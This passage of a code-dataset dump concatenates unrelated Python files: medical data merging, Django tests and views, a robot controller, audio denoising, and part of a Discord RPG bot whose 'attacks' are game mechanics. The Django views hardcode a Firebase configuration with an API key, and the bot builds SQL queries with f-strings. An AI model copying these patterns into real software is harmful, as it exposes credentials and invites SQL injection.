print(eval(\"dataA7\"))\n print(eval(\"dataA8\"))\n print(eval(\"dataA9\"))\n print(eval(\"dataA10\"))\n print(eval(\"dataA11\"))\n print(eval(\"dataA12\"))\n print(eval(\"dataA13\"))\n print(eval(\"dataA14\"))\n eval(\"dataA1.rename(columns={0:'원무접수ID',1:'HER2',2:'HER2_2'},inplace=True)\")\n eval(\"dataA2.rename(columns={0:'원무접수ID',1:'E_Cadherin',2:'E_Cadherin_2',3:'E_Cadherin_3', 4:'E_Cadherin_4'},inplace=True)\")\n eval(\"dataA3.rename(columns={0:'원무접수ID',1:'p53',2:'p53_2'},inplace=True)\")\n eval(\"dataA4.rename(columns={0:'원무접수ID',1:'Ki_67',2:'Ki_67_2',3:'Ki_67_3'},inplace=True)\")\n eval(\"dataA5.rename(columns={0:'원무접수ID',1:'CD31_N_D2_40'},inplace=True)\")\n eval(\"dataA6.rename(columns={0:'원무접수ID',1:'C_kit',2:'C_kit_2'},inplace=True)\")\n eval(\"dataA7.rename(columns={0:'원무접수ID',1:'CD34',2:'CD34_2'},inplace=True)\")\n eval(\"dataA8.rename(columns={0:'원무접수ID',1:'PKC_theta',2:'PKC_theta_2'},inplace=True)\")\n eval(\"dataA9.rename(columns={0:'원무접수ID',1:'s_100',2:'s_100_2',3:'s_100_3'},inplace=True)\")\n eval(\"dataA10.rename(columns={0:'원무접수ID',1:'SMA',2:'SMA_2'},inplace=True)\")\n eval(\"dataA11.rename(columns={0:'원무접수ID',1:'CK',2:'CK_2',3:'CK_3'},inplace=True)\")\n eval(\"dataA12.rename(columns={0:'원무접수ID',1:'Chromogranin',2:'Chromogranin_2'},inplace=True)\")\n eval(\"dataA13.rename(columns={0:'원무접수ID',1:'EBV',2:'EBV_2',3:'EBV_3'},inplace=True)\")\n eval(\"dataA14.rename(columns={0:'원무접수ID',1:'Giemsa',2:'Giemsa_2'},inplace=True)\")\n\n dfs=[eval(\"dataA1\"), eval(\"dataA2\"), eval(\"dataA3\"), eval(\"dataA4\"), eval(\"dataA5\"), eval(\"dataA6\"), eval(\"dataA7\"), eval(\"dataA8\"), eval(\"dataA9\"), eval(\"dataA10\"), \n eval(\"dataA11\"), eval(\"dataA12\"), eval(\"dataA13\"), eval(\"dataA14\")]\n data = reduce(lambda left, right: pd.merge(left, right, on='원무접수ID'), dfs)\n data1 = data.drop_duplicates()\n \n print(data1)\n data1.to_excel('C:/Users/Hyunjeong Ki/Gastric_Cancer_xlsx/genetic_step_02.xlsx')\n self.insert(data1, db_name=\"gc_protocol\", tb_name=\"genetic_step_02\")\n\n\nif __name__ == \"__main__\":\n obj = GeneticStep02()\n obj.run()","repo_name":"CNUHGILAB/Gastric_Cancer","sub_path":"Pathology_OD/Genetic_Step_02 copy.py","file_name":"Genetic_Step_02 copy.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35461253946","text":"from .base import FunctionalTest\n\nfrom unittest import skip\n#\n\nclass ItemValiddationaTets(FunctionalTest):\n\n def test_cannot_add_empty_lists_items(self):\n # 伊迪丝访问首页,不小心提交了一个空待办事项\n # 输入框中没输入内容,她就按下了回车键\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('\\n')\n # 首页刷新了,显示一个错误消息\n # 提示待办事项不能为空\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n # 她输入一些文字,然后再次提交,这次没问题了\n self.get_item_input_box().send_keys('Buy milk\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n # 她有点儿调皮,又提交了一个空待办事项\n self.get_item_input_box().send_keys('\\n')\n # 在清单页面她看到了一个类似的错误消息\n self.check_for_row_in_list_table('1:Buy milk')\n '''\n self.wait_for(lambda: self.assertEqual(\n self.browser.find_element_by_css_selector('.has-error').text,\n \"You can't have an empty list item\"\n )) \n \n '''\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n # 输入文字之后就没问题了\n 
self.get_item_input_box().send_keys('Buy tea\\n')\n self.check_for_row_in_list_table('1:Buy milk')\n self.check_for_row_in_list_table('2:Buy tea')\n self.fail('write me')\n @skip\n def test_cannot_add_duplicate_item(self):\n # Edith goes to the home page and starts a new list\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.check_for_row_in_list_table('1:Buy wellies')\n # she accidentally enters a duplicate item\n self.get_item_input_box().send_keys('Buy wellies\\n')\n # she sees a helpful error message\n self.check_for_row_in_list_table('1:Buy wellies')\n #error = self.browser.find_element_by_css_selector('.has-error')\n #self.assertEqual(error.text, \"You've already got this in your list\")\n self.wait_for(lambda: self.assertEqual(\n self.get_error_element().text,\n \"You've already got this in your list\"\n ))\n\n def test_error_messages_are_cleared_on_input(self):\n # Edith starts a new list in a way that triggers a validation error\n self.browser.get(self.server_url)\n self.get_item_input_box().send_keys('Buy wellies\\n')\n self.get_item_input_box().send_keys('Buy wellies\\n')\n error = self.get_error_element()\n self.assertTrue(error.is_displayed())\n\n # to clear the error, she starts typing in the input box\n self.get_item_input_box().send_keys('a')\n # she is pleased to see that the error message disappears\n error = self.get_error_element()\n self.assertFalse(error.is_displayed())\n\n\n def get_error_element(self):\n return self.browser.find_element_by_css_selector('.has-error')","repo_name":"sundhhy/TDD_Superlist","sub_path":"functional_tests/test_list_item_validation.py","file_name":"test_list_item_validation.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28693047084","text":"\"\"\"lab1_task2 controller.\"\"\"\n\n# TODO: figure out what's wrong with the angle, write readings to a file for plotting, and add an error message\n\nfrom controller import Robot\nimport math\n\n# create the Robot instance.\nrobot = Robot()\n\n# get the time step of the current world.\ntimestep = int(robot.getBasicTimeStep())\n\n# X degrees (0 - 360) [Modify]\nX = 20\n# Y seconds [Modify]\nY = 1 \n\ndegreeDiff = 360 - X\n\n# getting the motors and setting position and velocity\nleftMotor = robot.getDevice('left wheel motor')\nrightMotor = robot.getDevice('right wheel motor')\nleftMotor.setPosition(float('inf'))\nrightMotor.setPosition(float('inf'))\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n\n# getting the position sensors\nleftposition_sensor = robot.getDevice('left wheel sensor')\nrightposition_sensor = robot.getDevice('right wheel sensor')\nleftposition_sensor.enable(timestep)\nrightposition_sensor.enable(timestep)\n\nimu = robot.getDevice('inertial unit')\nimu.enable(timestep)\nrobot.step(timestep)\n\n# function to convert from degrees to radians\ndef degreesToRadians(deg):\n return (deg * math.pi / 180) \n \n# function to convert from radians to degrees (offset so the IMU's [-pi, pi] yaw maps to [0, 360])\ndef radiansToDegrees(rad):\n return ((rad + math.pi) * 180) / math.pi\n \ndistBetweenWheels = 2.28 \ndmid = distBetweenWheels / 2\nwheelRad = 0.8\nwheelCircum = 2 * wheelRad * math.pi\n\nXrad = degreesToRadians(X)\n\ndistanceLeft = Xrad * -dmid\ndistanceRight = Xrad * dmid\n\nvelocityLeft = distanceLeft / Y\nvelocityRight = distanceRight / Y\n\nphiLeft = velocityLeft / wheelRad\nphiRight = velocityRight / wheelRad\n\nangularVelocity = Xrad / Y\n\nprint(phiLeft)\nprint(phiRight)\n\nif (phiRight > 6.28):\n print (\"Error: Velocity exceeds 6.28\")\n exit()\n\ntime_start = robot.getTime()\n\nfile = open(\"lab1_task2_measurements.txt\", 
\"w\")\nfile.write(\"Angle:\\tTime:\\n\")\n\nleftMotor.setVelocity(phiLeft)\nrightMotor.setVelocity(phiRight)\n\n# main loop\nwhile robot.step(timestep) != -1 and (robot.getTime() - time_start < Y):\n\n leftMotor.setVelocity(phiLeft)\n rightMotor.setVelocity(phiRight)\n\n print(\"time: \" + str(robot.getTime() - time_start))\n print(\"degrees: \" + str(radiansToDegrees(imu.getRollPitchYaw()[2])))\n file.write(str(radiansToDegrees(imu.getRollPitchYaw()[2])) + \"\\t\" + str(robot.getTime() - time_start)+ \"\\n\")\n\nleftMotor.setVelocity(0)\nrightMotor.setVelocity(0)\n","repo_name":"bilaljoud/MobileRobotsLabs","sub_path":"Lab1/lab1_task2.py","file_name":"lab1_task2.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1243474701","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import ModelForm\nfrom apps.userprofile.models import SiteUser\nfrom apps.compo.models import Team\n\ndummy = []\n\n\nclass RegisterTeamForm(ModelForm):\n # teamname = forms.CharField(label='Lagnavn', max_length=30)\n # username = forms.ModelMultipleChoiceField(dummy)\n # action_url = 'add_team'\n class Meta:\n model = Team\n exclude = ('teamleader',)\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop(\"request\")\n tour = kwargs.pop(\"tour\")\n super(RegisterTeamForm, self).__init__(*args, **kwargs)\n unwanted_users = [self.request.user]\n for user in SiteUser.objects.all():\n if user.is_teamleader.filter(participant__tournament=tour) or \\\n user.is_teammember.filter(participant__tournament=tour):\n unwanted_users.append(user)\n self.fields['members'].queryset = SiteUser.objects.exclude(id__in=[o.id for o in unwanted_users])\n\n\nclass ChallongeForm(forms.Form):\n initial = 0\n CHOICES = (\n (u'single elimination', u'single elimination'),\n (u'double elimination', u'double elimination'),\n (u'round robin', u'round robin'),\n (u'swiss', u'swiss'),\n )\n type = forms.ChoiceField(choices=CHOICES, label=\"Challonge-type\")\n\n","repo_name":"kradalby/lanweb","sub_path":"apps/compo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70043980901","text":"import streamlit as st\nfrom mplsoccer import Pitch\n\nclass Pitch_class():\n def create_pitch(self, row_count=None, column_count=None):\n if row_count is None:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009')\n fig, ax = pitch.draw(figsize=(16, 11),constrained_layout=True, tight_layout=False)\n return pitch, fig, ax\n \n else:\n st.set_option('deprecation.showPyplotGlobalUse', False)\n pitch = Pitch(pitch_type='statsbomb', line_color='#000009', line_zorder=row_count+column_count+2, linewidth=1)\n fig, axs = pitch.grid(nrows=row_count, ncols=column_count, figheight=3 * (row_count+column_count),\n axis=False, endnote_height=0, title_height=0)\n return pitch, fig, axs\n \ndef add_locations(df):\n x = []; y = []\n for i, row in df.iterrows():\n x.append(row['location'][0])\n y.append(row['location'][1])\n df['x'] = x\n df['y'] = y\n return df\n\n#changes array elements by their cumuluative sum\ndef nums_cumulative_sum(nums_list):\n return [sum(nums_list[ :i+1]) for i in 
range(len(nums_list))]","repo_name":"berkanyuce/FIFA-World-Cup-2018-Visualization-and-Prediction","sub_path":"codes/utilites/utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"7152414899","text":"int1 = int(input())\r\nint2 = int(input())\r\nint3 = int(input())\r\n\r\n# use >= (with a final else) so that equal values still print the largest number\r\nif int1 >= int2 and int1 >= int3:\r\n    print(int1)\r\nelif int2 >= int1 and int2 >= int3:\r\n    print(int2)\r\nelse:\r\n    print(int3)\r\n","repo_name":"danielfilev/SoftUni","sub_path":"Fundamentals/Basic Syntax, Conditional Statements and Loops/Lab/02.largest_of_three_numbers.py","file_name":"02.largest_of_three_numbers.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37973374926","text":"from django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport functools\nimport json\nimport os\nimport pyrebase\n \nfrom ppw.data.relational_queries import (\n    accession_trend_by_time_query, active_inactive_investidors_query,\n    age_distribution_query, carreer_investidor_activity_year_query,\n    city_with_most_investidors_query, civil_status_investidors_activity_query,\n    investidors_genre_query, most_common_job_query,\n    state_with_most_investidors_query, top_3_most_common_jobs_query)\n \nconfig = {\n    \"apiKey\": \"AIzaSyBWocM1wzV1lZh64h-IF1Owo-A3u8zrYlk\",\n    \"authDomain\": \"projeto-ppw.firebaseapp.com\",\n    \"databaseURL\": \"https://projeto-ppw-default-rtdb.firebaseio.com\",\n    \"projectId\": \"projeto-ppw\",\n    \"storageBucket\": \"projeto-ppw.appspot.com\",\n    \"messagingSenderId\": \"1021347829402\",\n    \"appId\": \"1:1021347829402:web:84b85d7e00f6956dbd3123\"\n}\n \n# Initialising database,auth and firebase for further use\nfirebase=pyrebase.initialize_app(config)\nauthe = firebase.auth()\ndatabase=firebase.database()\nPREFIX = 'Bearer '\n\ndef get_token(header):\n    if not header.startswith(PREFIX):\n        raise ValueError('Invalid token')\n    return header[len(PREFIX):]\n\ndef check_user_auth(view_func):\n    @functools.wraps(view_func)\n    @csrf_exempt\n    def wrapper(request, *args, **kwargs):\n        if 'token' not in request.session:\n            return _build_response({\"result\": \"error - user must be logged\"})\n        return view_func(request, *args, **kwargs)\n    return wrapper\n \n@csrf_exempt\ndef signup(request):\n    data = json.loads(request.body)\n    email = data['email']\n    passs = data['pass']\n    try:\n        user = authe.create_user_with_email_and_password(email, passs)\n        request.session['token'] = user['localId']\n    except Exception as ex:\n        print (ex)\n        return _build_response({\"result\": \"error to sign up\"})\n    return _build_response({\"result\": \"success\"})\n\n@csrf_exempt\ndef login(request):\n    data = json.loads(request.body)\n    email = data['email']\n    pasw = data['pass']\n    try:\n        user = authe.sign_in_with_email_and_password(email,pasw)\n    except Exception as ex:\n        print (ex)\n        return _build_response({\"error\": \"invalid credentials\"})\n    session_id = user['idToken']\n    request.session['token'] = str(session_id)\n    return _build_response({\"token\": session_id})\n\n@check_user_auth\ndef age_distribution_view(request):\n    age_min = request.GET.get('age_min', 18)\n    age_max = request.GET.get('age_max', 100)\n    age_distribution = list(age_distribution_query(age_min, age_max))\n    return _build_response(age_distribution)\n \n
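# Note on the pattern above (a sketch of the intended flow, not verified against the full project): every view below is wrapped by check_user_auth, so a client must first hit signup/login (which stores request.session['token']) before any query view returns data; otherwise it gets the \"user must be logged\" payload. Hypothetical client calls, with route names assumed:\n#   requests.post(base_url + '/login', json={'email': e, 'pass': p})\n#   requests.get(base_url + '/age_distribution', params={'age_min': 20})\n@check_user_auth\ndef 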
top_3_most_common_jobs_view(request):\n top_job = list(top_3_most_common_jobs_query())\n return _build_response(top_job)\n \n@check_user_auth\ndef active_inactive_investidors_view(request):\n active_inactive_data = list(active_inactive_investidors_query())\n return _build_response(active_inactive_data)\n \n@check_user_auth\ndef state_most_investidors_lives_view(request):\n state_most_investidors = list(state_with_most_investidors_query())\n return _build_response(state_most_investidors)\n \n@check_user_auth\ndef city_most_investidors_lives_view(request):\n state = request.GET.get('state')\n city_most_investidors = list(city_with_most_investidors_query(state))\n return _build_response(city_most_investidors)\n \n@check_user_auth\ndef investidors_genre_view(request):\n age = request.GET.get('age')\n investidors_genre = list(investidors_genre_query(age))\n return _build_response(investidors_genre)\n \n@check_user_auth\ndef accession_trend_view(request):\n accession_trend = list(accession_trend_by_time_query())\n print (accession_trend)\n return _build_response(accession_trend)\n \n@check_user_auth\ndef most_common_carrer_view(request):\n most_common_job = list(most_common_job_query())\n return _build_response(most_common_job)\n \n@check_user_auth\ndef investidor_carreer_year_view(request):\n activity_investidor_carreer = list(carreer_investidor_activity_year_query())\n return _build_response(activity_investidor_carreer)\n \n@check_user_auth\ndef civil_status_investidors_activity_view(request):\n civil_status_investidors = list(civil_status_investidors_activity_query())\n return _build_response(civil_status_investidors)\n \ndef _build_response(result):\n return JsonResponse({'result': result})\n ","repo_name":"manoelvlm/projeto-ppw","sub_path":"api/ppw/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29508727799","text":"import librosa\nfrom pysndfx import AudioEffectsChain\nimport numpy as np\nimport math\nimport scipy\n\n\ndef read_file(file_name):\n sample_file = file_name\n sample_path = sample_file\n\n y, sr = librosa.load(sample_path, None)\n\n return y, sr\n\n\ndef reduce_noise_power(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = round(np.median(cent)) * 1.5\n threshold_l = round(np.median(cent)) * 0.1\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, frequency=threshold_l, slope=0.8)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\n y_clean = less_noise(y)\n\n return y_clean\n\n\ndef reduce_noise_centroid_s(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-12.0, frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-12.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=6.0)\n\n y_cleaned = less_noise(y)\n\n return y_cleaned\n\n\ndef reduce_noise_centroid_mb(y, sr):\n \"\"\"\n :param y: audio matrix\n :param sr:\n :return: audio matrix after gain reduction on noise\n \"\"\"\n cent = librosa.feature.spectral_centroid(y=y, sr=sr)\n\n threshold_h = np.max(cent)\n threshold_l = np.min(cent)\n\n less_noise = AudioEffectsChain()\\\n .lowshelf(gain=-30.0, 
frequency=threshold_l, slope=0.5)\\\n .highshelf(gain=-30.0, frequency=threshold_h, slope=0.5)\\\n .limiter(gain=10.0)\n y_cleaned = less_noise(y)\n\n cent_cleaned = librosa.feature.spectral_centroid(y=y_cleaned, sr=sr)\n columns, rows = cent_cleaned.shape\n boost_h = math.floor(rows / 3 * 2)\n\n boost_bass = AudioEffectsChain().lowshelf(gain=16.0, frequency=boost_h, slope=0.5)\n y_clean_boosted = boost_bass(y_cleaned)\n\n return y_clean_boosted\n\n\ndef reduce_noise_median(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after gain reduction on noise\n \"\"\"\n y = scipy.signal.medfilt(y, 3)\n return y\n\n\ndef trim_silence(y):\n \"\"\"\n :param y:\n :return: audio matrix with less silence and the amount of time that was trimmed\n \"\"\"\n y_trimmed, index = librosa.effects.trim(y, top_db=20, frame_length=2, hop_length=10)\n trimmed_length = librosa.get_duration(y) - librosa.get_duration(y_trimmed)\n\n return y_trimmed, trimmed_length\n\n\ndef enhance(y):\n \"\"\"\n :param y: audio matrix\n :return: audio matrix after audio manipulation\n \"\"\"\n apply_audio_effects = AudioEffectsChain()\\\n .lowshelf(gain=10.0, frequency=260, slope=0.1)\\\n .reverb(reverberance=25, hf_damping=5, room_scale=5, stereo_depth=50, pre_delay=20, wet_gain=0, wet_only=False)\n y_enhanced = apply_audio_effects(y)\n\n return y_enhanced\n\n\ndef output_file(destination, file_name, y, sr, ext=\"\"):\n \"\"\"\n generates a wav file\n :param destination:\n :param file_name:\n :param y:\n :param sr:\n :param ext:\n :return: None\n \"\"\"\n destination = destination + file_name.split(\"/\")[-1][:-4] + ext + '.wav'\n librosa.output.write_wav(destination, y, sr)\n","repo_name":"YunhoJung/tobigs-rhapsody-speech-synthesis","sub_path":"augmentation/reduct_noise.py","file_name":"reduct_noise.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71907688100","text":"import logging\nimport os\n\nimport pandas as pd\nfrom decide import data_folder\nfrom decide.data.database import connection, Manager\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\n\n\ndef write_result(conn, iterations, model_run_id, output_directory):\n\n df = pd.read_sql(\"\"\"\n SELECT \n a.p as p,\n a.issue as issue, \n a.repetion || '-' || a.iteration as pointer, \n a.numerator / a.denominator AS nbs\n FROM (SELECT\n sum(ai.position * ai.power * ai.salience) AS numerator,\n sum(ai.salience * ai.power) AS denominator,\n r.pointer AS repetion,\n i2.pointer AS iteration,\n m.p,\n i.name as issue\n FROM actorissue ai\n LEFT JOIN issue i ON ai.issue_id = i.id\n LEFT JOIN actor a ON ai.actor_id = a.id\n LEFT JOIN iteration i2 ON ai.iteration_id = i2.id\n LEFT JOIN repetition r ON i2.repetition_id = r.id\n LEFT JOIN modelrun m ON r.model_run_id = m.id \n WHERE ai.type = 'after' AND i2.pointer = ? AND m.id = ? 
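-- the numerator/denominator above form the salience- and power-weighted mean position per issue (the NBS): sum(position*power*salience) / sum(salience*power)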
\n          GROUP BY m.id,r.id, i2.id, i.id) a\n        \"\"\",\n        conn,\n        params=(iterations, model_run_id, ),\n        index_col=['p'],\n        columns=['issue']\n    )\n\n    for p in sorted(set(df.index)):\n        x = df.loc[p].pivot(index='pointer', columns='issue', values='nbs').cov().round(5)\n\n        x.to_csv(os.path.join(output_directory, 'covariance.equal-{}.csv'.format(p)))\n\n        logging.info('written covariance table for p={}'.format(p))\n\n\nif __name__ == '__main__':\n    m = Manager(os.environ.get('DATABASE_URL'))\n    m.init_database()\n\n    model_run_id = 1\n    iterations = 10  # assumed value for the iteration pointer that write_result requires\n\n    write_result(connection, iterations, model_run_id, data_folder)\n","repo_name":"foarsitter/decide-exchange-model","sub_path":"decide/results/covariance.py","file_name":"covariance.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"24715521621","text":"import grequests\nimport math\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport aiosqlite\nimport asyncio\nimport random\nfrom discord import Webhook, AsyncWebhookAdapter\nimport aiohttp\nfrom PIL import Image\n\neffect_list = {\n    \"shatter\" : \"Your mind has been shattered! Your messages are jumbled up!\",\n    \"polymorph\" : \"You're a sheep! You can't speak human languages!\",\n    \"drunk\" : \"You had a bit too much to drink...\",\n    \"burning\" : \"You are on fire. Good luck.\",\n    \"poisoned\" : \"Every time you make an attack, you lose an extra 2 AP!\",\n    \"confidence\" : \"Hey, you're pretty good at this! Slightly raises your critical chance.\",\n    \"inspired\" : \"You're amazing! Good job! Considerably raises your critical chance.\",\n    \"defending\" : \"You are prepared for someone to strike! Anyone who attacks you fails, wasting their AP.\",\n    \"wooyeah\" : \"**WOO YEAH IM ON A ROLL**\",\n
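    # Note: these keys must stay lowercase and in sync with the string checks in can_attack() and crit_handler() below, which compare status[0].lower() against these exact names.\n    \"shrouded\" : \"You're covered in some sort of shroud! 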
It's harder for enemies to get a crit on you!\"\n}\n\nbase_classes = {\n 1 : 'Apprentice',\n 2 : 'Swordsman',\n 3 : 'Rogue',\n 4 : 'Archer',\n}\n\nprefix = ';'\n\nunobtainable_achs = 1\n\nwith open('adjectives.txt') as f:\n sheep_names = [line.rstrip() for line in f]\n\nbody_parts = ['bones', 'hair', 'fingernail', 'thumb', 'middle finger', 'big toe', 'knees', 'kneecap', 'bum', 'cheek', 'bumcheek', 'leg hair', 'skeleton', 'ligaments', 'muscles', 'tendons', 'teeth', 'mouth', 'tongue', 'larynx', 'esophagus', 'stomach', 'small intestine', 'large intestine', 'liver', 'gallbladder', 'mesentery', 'pancreas', 'anus', 'nasal cavity', 'pharynx', 'larynx', 'trachea', 'lungs', 'diaphragm', 'groin', 'kidneys', 'heart', 'spleen', 'thymus', 'brain', 'cerebellum', 'spine', 'eye', 'ear', 'arm', 'leg', 'chest', 'neck', 'toe', 'finger']\n\nmagnitudeDict={0:'', 1:'Thousand', 2:'Million', 3:'Billion', 4:'Trillion', 5:'Quadrillion', 6:'Quintillion', 7:'Sextillion', 8:'Septillion', 9:'Octillion', 10:'Nonillion', 11:'Decillion'}\n\ndef simplify(num):\n num=math.floor(num)\n magnitude=0\n while num>=1000.0:\n magnitude+=1\n num=num/1000.0\n return(f'{math.floor(num*100.0)/100.0} {magnitudeDict[magnitude]}')\n\nasync def add_effect(target, bot, effect_name, amount = 1):\n speaker = target.id\n if speaker not in bot.user_status:\n bot.user_status[speaker] = []\n user_effects = bot.user_status[speaker]\n exists = False\n for status in user_effects: # If the status exists, increment it.\n if status[0].lower() == effect_name.lower():\n exists = True\n status[1] += amount\n if not exists:\n bot.user_status[speaker].append([effect_name.lower(), amount])\n\nasync def find_origin(user_class):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select class_name, preclass from classes;\") as chan:\n clss = await chan.fetchall()\n origin = user_class\n wcase = 0\n b_classes = [\"swordsman\", \"apprentice\", \"rogue\", \"archer\"]\n while origin not in b_classes:\n wcase +=1\n if wcase >= 10:\n break\n for item in clss:\n if item[0] == origin:\n origin = item[1]\n\n return(origin)\n\nasync def reply_check(message):\n if message.reference:\n return True\n else:\n return False\n\nasync def can_attack(user, target, ctx): # NOTE: Remember that you can't alter AP of those who have no profile in CC... Also, target may not always exist\n bot = ctx.bot\n if user not in bot.user_status:\n bot.user_status[user] = []\n user_effects = bot.user_status[user]\n for status in user_effects: \n if status[0].lower() == \"poisoned\":\n ### HANDLE STACKS\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[user].remove(status)\n else:\n status[1] -= 1\n ### APPLY EFFECT\n uid = str(user)\n balance = (bot.users_ap[uid] - 2)\n if balance >= 0:\n bot.users_ap[uid] = balance\n\n # UPDATE ATTACKING BASED QUESTS\n attack_based_quests = [7, 8, 9, 10, 11, 12, 13, 14]\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select currently_questing from users where id = '{ctx.author.id}';\") as chan:\n quest = await chan.fetchone()\n if quest:\n quest = quest[0]\n if quest in attack_based_quests:\n await update_quest(ctx.message, quest, 1, ctx.bot)\n # UPDATE ATTACKING BASED QUESTS\n\n # CHECK FOR DEFENDING AND MORE\n \"\"\"\n Priority List\n 1. Sellsword\n 2. 
Status Effects\n    \"\"\"\n\n    protected = bot.get_cog('sellsword').hired\n\n    if target in list(protected.values()):\n        vals = list(protected.values())\n        keys = list(protected.keys())\n        protector = keys[vals.index(target)]\n        try:\n            ss_hooks = [\n                \"Right as you're about to attack, you feel a stab in your back! It's usr1, usr2's sellsword! You fall over, dead!\",\n                \"You attempt to kill usr2, but usr1 blocks your attack before swiftly slicing your neck! usr2 nods at usr1, and continues on their way.\",\n                \"Your attempt to attack usr2 is thwarted by usr1, who fires a crossbow bolt into your neck right as you're about to land your attack!\",\n                \"usr2 sees your attack coming, but doesn't seem worried. Perplexed, you attempt to attack anyway! As you do, you feel usr1's blade through your back! usr2 smiles at you as the world goes dark.\"\n            ]\n            usr1 = bot.get_user(protector)\n            usr2 = bot.get_user(target)\n            hook = random.choice(ss_hooks)\n            hook = hook.replace(\"usr1\", f\"**{usr1.name}**\")\n            hook = hook.replace(\"usr2\", f\"**{usr2.display_name}**\")\n            async with aiosqlite.connect('main.db') as conn:\n                async with conn.execute(f\"select coolness from users where id = '{protector}';\") as current_amount:\n                    coolness = await current_amount.fetchone()\n                await conn.execute(f\"update users set coolness = '{coolness[0]+100}' where id = '{protector}';\")\n                await conn.commit()\n            await ctx.send(\"**[BLOCKED] | **\" + hook)\n        except:\n            await ctx.send(\"Your attempt to attack fails as their sellsword protects them, stabbing you instead!\")\n        return False\n\n    if target not in bot.user_status:\n        bot.user_status[target] = []\n    user_effects = bot.user_status[target]\n    for status in user_effects: \n        if status[0].lower() == \"defending\":\n            ### HANDLE STACKS\n            remaining_stacks = status[1]-1\n            if remaining_stacks <= 0:\n                bot.user_status[target].remove(status)  # remove the spent status entry from the defender's list\n            else:\n                status[1] -= 1\n            ### APPLY EFFECT\n            await ctx.send(\"You attempt to attack, but you cannot penetrate their defenses! Your attack fails!\")\n            return False\n    # CHECK FOR DEFENDING AND MORE\n\n    return True\n\nasync def crit_handler(bot, attacker, defender, boost = None): \n    # Values needed for later ############################################################ #\n    crit_thresh = 1    # The number needed to roll below to get a critical                 #\n    crit_max = 20      # The maximum number that the critical will be rolled on            #\n    ########################################################################################\n    # We will now check for the person being attacked's status effects, to see if they have#\n    # some sort of protective status effect.                                               #\n    ########################################################################################\n    \n    speaker = defender\n    force_crit = None\n    if speaker in bot.user_status:\n        user_effects = bot.user_status[speaker]\n        for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. 
These are applied in order\n if status[0].lower() == \"shrouded\":\n crit_max += 10\n force_crit = random.randint(1,crit_max) \n ### HANDLE STACKS\n if not(force_crit <= crit_thresh):\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n ### Now we check for the rest of the stuff #\n if boost: #\n if boost > 0: #\n crit_thresh += boost #\n else: #\n crit_max += boost #\n ### #\n if force_crit != None:\n crit = force_crit\n else:\n crit = random.randint(1,crit_max) # The rolled critical chance #\n # End Values #\n ###################################################################################### #\n ###################################################################################### #\n # Getting user status effects to check for critical-altering ones ### \n # THESE ARE FOR POSITIVE EFFECTS #\n speaker = attacker\n if speaker in bot.user_status:\n user_effects = bot.user_status[speaker]\n for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. These are applied in order\n if status[0].lower() == \"confidence\":\n crit_thresh += 4\n ### HANDLE STACKS\n if crit <= crit_thresh:\n 